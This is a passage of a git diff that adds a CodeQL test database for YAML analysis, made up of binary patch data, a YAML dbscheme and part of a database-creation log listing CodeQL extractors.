zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N 
z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly 
zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U iAV7cs0RjXF5FkK+009C72oNAZfB=C7fl5x_H>VE`i2?Qi literal 0 HcmV?d00001 diff --git a/ql/lib/test-db/db-yaml/default/pools/poolInfo b/ql/lib/test-db/db-yaml/default/pools/poolInfo new file mode 100644 index 0000000000000000000000000000000000000000..6a51696b7cb94b49cb29a40c8f1618c418c97763 GIT binary patch literal 32 YcmZQz00Sl<$q2;mP#P?#`{RfV019gYQ2+n{ literal 0 HcmV?d00001 diff --git a/ql/lib/test-db/db-yaml/default/sourceLocationPrefix.rel b/ql/lib/test-db/db-yaml/default/sourceLocationPrefix.rel new file mode 100644 index 0000000000000000000000000000000000000000..720d64f4baafc33efdf971f02084aca5f25b34a5 GIT binary patch literal 4 LcmZQzU|<9Q00jU7 literal 0 HcmV?d00001 diff --git a/ql/lib/test-db/db-yaml/default/sourceLocationPrefix.rel.checksum b/ql/lib/test-db/db-yaml/default/sourceLocationPrefix.rel.checksum new file mode 100644 index 0000000000000000000000000000000000000000..c7704aa3482aaf78913dfb092fa6012f2e14e373 GIT binary patch literal 12 RcmZQzU|?hbf-vXzT>u200u%rM literal 0 HcmV?d00001 diff --git a/ql/lib/test-db/db-yaml/default/strings/0/buckets/page-000000 b/ql/lib/test-db/db-yaml/default/strings/0/buckets/page-000000 new file mode 100644 index 0000000000000000000000000000000000000000..c44d5f88d6c4629a84a90da758cdadf0ed87e804 GIT binary patch literal 8192 zcmeIufeipK2m&y5|Np!%OfcmEpjASE009C72oNAZU|(SND^EAR)9-T6b?$V_2@oJa UfB*pk1PBlyK!5-N0t5mDKAHFc2LJ#7 literal 0 HcmV?d00001 
diff --git a/ql/lib/test-db/db-yaml/default/strings/0/metadata/page-000000 b/ql/lib/test-db/db-yaml/default/strings/0/metadata/page-000000 new file mode 100644 index 0000000000000000000000000000000000000000..42938ceef8f891f706d4353febf3984dc4886b15 GIT binary patch literal 8192 zcmeIuArXL36hzV201J``bRfqsfWpv)!6L|qK(n+!oSnI|{!~@<>70-I`ysXU+Nb=O to^9!JMt}eT0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PJ_C;00da2L}KE literal 0 HcmV?d00001 
diff --git a/ql/lib/test-db/db-yaml/default/strings/0/pageDump/page-000000000 b/ql/lib/test-db/db-yaml/default/strings/0/pageDump/page-000000000 new file mode 100644 index 0000000000000000000000000000000000000000..e312329da67e9cd0ca5fea26c379f7b94f230b77 GIT binary patch literal 1048592 zcmeIuu?>JA07Owoq0|C)vY;?QNB|SZcLANickRzLFW<)u{i-9j8d6FjmVM?ibDg=r zhL1y7YwPD;w#5h#AV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ 
z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF 
z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs 
z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly KK!5;&p9?&Xo*VA~ literal 0 HcmV?d00001 diff --git a/ql/lib/test-db/db-yaml/default/yaml.rel b/ql/lib/test-db/db-yaml/default/yaml.rel new file mode 100644 index 0000000000000000000000000000000000000000..5f848073652e137ce970cd362a76f858865fd7c4 GIT binary patch literal 1416 zcmYk6>q{455QW$Bn`LHcR(98vQVOlq?%IVA2}L5JPhv=fh-gIgw|9G<-90b|4)c4@ z46|ou-~BaBGt@NA01Phh<1IYZ3(0%-_i*%opg*4`jzlM(==C$iQE2}m%KsAW{|26e zB6<7TV+>k9+V{8qF&u{?dF#)@2}Lkg{MhqSt9JGA<1;6r{jHB5dt8AcdHbJ-*A&5I z>93cYt=jcJ$#3f~!YSzU?Ei3ggrM`dor*P$VCpuRFO}Ek50)cU@RteZFf| z^y2d_+InQ2+M-P1L`;+=3!`>)p?`BG@eceTN@fwX2W+ z`)D7d7yk=rpQ01v-<^MsUi?2q+v#<`sq}xs?_H>Wzth||-|ZJDlGnfA>7F9kE&lEK zwN<yX~>pJ_p=! z&>@E%anv!#jX2??Q%*bMtaENV?}Cdix$KIouDR}pn{K)9frtKhZy$^o-=$B7E`{Ju_zWd?lKP`VC3IG5A literal 0 HcmV?d00001 diff --git a/ql/lib/test-db/db-yaml/default/yaml_locations.rel.checksum b/ql/lib/test-db/db-yaml/default/yaml_locations.rel.checksum new file mode 100644 index 0000000000000000000000000000000000000000..9fc567e5c0691ecfc1890d2dc38b0fa83b5e39ea GIT binary patch literal 12 RcmZQzU|?hbf<~j}b^ruC0lxqM literal 0 HcmV?d00001 
diff --git a/ql/lib/test-db/db-yaml/default/yaml_scalars.rel b/ql/lib/test-db/db-yaml/default/yaml_scalars.rel new file mode 100644 index 0000000000000000000000000000000000000000..573ab48b75431cf7a24d52077aa8a0371ccb9604 GIT binary patch literal 552 zcmXZZT}whi7)9Z^Pt&Z#N)6J?Oe;}D{K$-m5D_Fqq^m$eM8u1b@YlO{tphLX;h;0l z7($4I|K~tC#8EYlW9l*XyCgnRQ#hfXV}CY-Pt;3%s$StUwSfJ-BEC>dIIUK&*L%QO zwT``B1LxEx&Z{kat#+{YdcxlS1$&)We5<};uk()Y)B*N7LtIuz*uQy6PT_`T2frSa3&%>NXE@BAD4&KKC{TjH*|!anO7`@h>@-~SKx8MnBn K{^DnKhx>avaT2`% literal 0 HcmV?d00001 diff --git a/ql/lib/test-db/db-yaml/default/yaml_scalars.rel.checksum b/ql/lib/test-db/db-yaml/default/yaml_scalars.rel.checksum new file mode 100644 index 0000000000000000000000000000000000000000..7aae4dc38a0fef1277b98a50776a547dd54eafc3 GIT binary patch literal 12 RcmZQzU|?hbf(z-A{{aQN0#N_} literal 0 HcmV?d00001 diff --git a/ql/lib/test-db/db-yaml/yaml.dbscheme b/ql/lib/test-db/db-yaml/yaml.dbscheme new file mode 100755 index 000000000000..20d83c71ee67 --- /dev/null +++ b/ql/lib/test-db/db-yaml/yaml.dbscheme 
@@ -0,0 +1,80 @@
+/*- YAML -*/
+
+#keyset[parent, idx]
+yaml (unique int id: @yaml_node,
+ int kind: int ref,
+ int parent: @yaml_node_parent ref,
+ int idx: int ref,
+ string tag: string ref,
+ string tostring: string ref);
+
+case @yaml_node.kind of
+ 0 = @yaml_scalar_node
+| 1 = @yaml_mapping_node
+| 2 = @yaml_sequence_node
+| 3 = @yaml_alias_node
+;
+
+@yaml_collection_node = @yaml_mapping_node | @yaml_sequence_node;
+
+@yaml_node_parent = @yaml_collection_node | @file;
+
+yaml_anchors (unique int node: @yaml_node ref,
+ string anchor: string ref);
+
+yaml_aliases (unique int alias: @yaml_alias_node ref,
+ string target: string ref);
+
+yaml_scalars (unique int scalar: @yaml_scalar_node ref,
+ int style: int ref,
+ string value: string ref);
+
+yaml_errors (unique int id: @yaml_error,
+ string message: string ref);
+
+yaml_locations(unique int locatable: @yaml_locatable ref,
+ int location: @location_default ref);
+
+@yaml_locatable = @yaml_node | @yaml_error;
+
+/*- Files and folders -*/
+
+/**
+ * The location of an element.
+ * The location spans column `startcolumn` of line `startline` to
+ * column `endcolumn` of line `endline` in file `file`.
+ * For more information, see
+ * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/).
+ */
+locations_default(
+ unique int id: @location_default,
+ int file: @file ref,
+ int beginLine: int ref,
+ int beginColumn: int ref,
+ int endLine: int ref,
+ int endColumn: int ref
+);
+
+files(
+ unique int id: @file,
+ string name: string ref
+);
+
+folders(
+ unique int id: @folder,
+ string name: string ref
+);
+
+@container = @file | @folder
+
+containerparent(
+ int parent: @container ref,
+ unique int child: @container ref
+);
+
+/*- Source location prefix -*/
+
+/**
+ * The source location of the snapshot.
+ */
+sourceLocationPrefix(string prefix : string ref);
diff --git a/ql/lib/test-db/diagnostic/cli-diagnostics-add-20240203T091755.518Z.json b/ql/lib/test-db/diagnostic/cli-diagnostics-add-20240203T091755.518Z.json
new file mode 100644
index 000000000000..e69de29bb2d1
diff --git a/ql/lib/test-db/diagnostic/cli-diagnostics-add-20240203T091756.033Z.json b/ql/lib/test-db/diagnostic/cli-diagnostics-add-20240203T091756.033Z.json
new file mode 100644
index 000000000000..e69de29bb2d1
diff --git a/ql/lib/test-db/log/database-create-20240203.101754.571.log b/ql/lib/test-db/log/database-create-20240203.101754.571.log
new file mode 100644
index 000000000000..8c7f3e173b71
--- /dev/null
+++ b/ql/lib/test-db/log/database-create-20240203.101754.571.log
@@ -0,0 +1,275 @@ +[2024-02-03 10:17:54] This is codeql database create ql/lib/test-db -l yaml -s ql/lib/test +[2024-02-03 10:17:54] Log file was started late. +[2024-02-03 10:17:54] [PROGRESS] database create> Initializing database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db. +[2024-02-03 10:17:54] Running plumbing command: codeql database init --language=yaml --extractor-options-verbosity=1 --qlconfig-file=/Users/pwntester/seclab/projects/actions/codeql-actions/qlconfig.yml --source-root=/Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test --allow-missing-source-root=false --allow-already-existing -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db +[2024-02-03 10:17:54] Calling plumbing command: codeql resolve languages --extractor-options-verbosity=1 --format=betterjson +[2024-02-03 10:17:54] [DETAILS] resolve languages> Scanning for [codeql-extractor.yml] from /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/.codeqlmanifest.json +[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/go/codeql-extractor.yml. +[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/python/codeql-extractor.yml. +[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/java/codeql-extractor.yml. +[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/html/codeql-extractor.yml. +[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/xml/codeql-extractor.yml. 
+[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/properties/codeql-extractor.yml. +[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/cpp/codeql-extractor.yml. +[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/swift/codeql-extractor.yml. +[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csv/codeql-extractor.yml. +[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/codeql-extractor.yml. +[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csharp/codeql-extractor.yml. +[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/javascript/codeql-extractor.yml. +[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/ruby/codeql-extractor.yml. 
+[2024-02-03 10:17:54] Plumbing command codeql resolve languages completed: + { + "aliases" : { + "c" : "cpp", + "c++" : "cpp", + "c-c++" : "cpp", + "c-cpp" : "cpp", + "c#" : "csharp", + "java-kotlin" : "java", + "kotlin" : "java", + "javascript-typescript" : "javascript", + "typescript" : "javascript" + }, + "extractors" : { + "go" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/go" + } + ], + "python" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/python", + "extractor_options" : { + "logging" : { + "title" : "Options pertaining to logging.", + "description" : "Options pertaining to logging.", + "type" : "object", + "properties" : { + "verbosity" : { + "title" : "Python extractor logging verbosity level.", + "description" : "Controls the level of verbosity of the CodeQL Python extractor.\nThe supported levels are (in order of increasing verbosity):\n\n - off\n - errors\n - warnings\n - info or progress\n - debug or progress+\n - trace or progress++\n - progress+++\n", + "type" : "string", + "pattern" : "^(off|errors|warnings|(info|progress)|(debug|progress\\+)|(trace|progress\\+\\+)|progress\\+\\+\\+)$" + } + } + } + } + } + ], + "java" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/java", + "extractor_options" : { + "exclude" : { + "title" : "A glob excluding files from analysis.", + "description" : "A glob indicating what files to exclude from the analysis.\n", + "type" : "string" + }, + "add_prefer_source" : { + "title" : "Whether to always prefer source files over class files.", + "description" : "A value indicating whether source files should be preferred over class files. If set to 'true', the extraction adds '-Xprefer:source' to the javac command line. If set to 'false', the extraction uses the default javac behavior ('-Xprefer:newer'). 
The default is 'true'.\n", + "type" : "string", + "pattern" : "^(false|true)$" + }, + "buildless" : { + "title" : "Whether to use buildless (standalone) extraction (experimental).", + "description" : "A value indicating, which type of extraction the autobuilder should perform. If 'true', then the standalone extractor will be used, otherwise tracing extraction will be performed. The default is 'false'. Note that buildless extraction will generally yield less accurate analysis results, and should only be used in cases where it is not possible to build the code (for example if it uses inaccessible dependencies).\n", + "type" : "string", + "pattern" : "^(false|true)$" + } + } + } + ], + "html" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/html" + } + ], + "xml" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/xml" + } + ], + "properties" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/properties" + } + ], + "cpp" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/cpp", + "extractor_options" : { } + } + ], + "swift" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/swift" + } + ], + "csv" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csv" + } + ], + "yaml" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml" + } + ], + "csharp" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csharp", + "extractor_options" : { + "trap" : { + "title" : "Options pertaining to 